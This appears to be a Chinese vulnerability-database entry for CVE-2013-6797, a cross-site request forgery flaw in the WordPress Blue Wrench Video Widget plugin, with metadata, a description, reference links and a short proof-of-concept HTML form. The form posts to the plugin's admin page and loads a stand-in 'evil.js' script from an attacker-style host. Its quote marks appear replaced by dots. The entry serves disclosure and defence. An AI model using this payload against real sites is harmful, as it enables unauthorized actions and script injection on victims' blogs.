WordPres Blue Wrench Video Widget插件跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121952 漏洞类型 跨站请求伪造
发布时间 2013-11-23 更新时间 2013-11-23
CVE编号 CVE-2013-6797 CNNVD-ID CNNVD-201311-256
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/38844
https://www.securityfocus.com/bid/63800
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201311-256
|漏洞详情
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。BlueWrenchVideoWidget是其中的一个视频编辑插件,它支持将视频嵌入到YouTube、优酷等视频分享网站。WordPress的BlueWrenchVideoWidget插件2.0.0之前的版本中的bluewrench-video-widget.php脚本中存在跨站请求伪造漏洞,该漏洞源于bw-videos页面中的wp-admin/admin.php脚本没有充分过滤‘bw_url’参数。远程攻击者可借助特制的参数利用该漏洞执行未授权操作。
|漏洞EXP
source: http://www.securityfocus.com/bid/63800/info

The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected. 

<form id=.upload-form. 
action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos. 
method=.post.>
<table class=.form-table.>
<tbody>
<tr valign=.top.>
<th scope=.row.>Title</th>
<td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title. 
size=.70. value=.http://www.example2.com/code/evil.js. />
</tr>
<tr valign=.top .>
<th scope=.row.>URL</th>
<td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url. 
size=.70. value=.http://www.example2.com/code/evil.js. />
</td>
</tr>
</tbody>
</table>
</form>
|受影响的产品
WordPress Blue Wrench Video Widget 1.0.2
|参考资料

来源:wordpress.org
链接:http://wordpress.org/plugins/blue-wrench-videos-widget/changelog
来源:securityundefined.com
链接:http://securityundefined.com/wordpress-plugin-blue-wrench-video-widget-csrf-persistent-xss-0day-disclosure/
来源:OSVDB
名称:98923
链接:http://osvdb.org/98923
来源:OSVDB
名称:98922
链接:http://osvdb.org/98922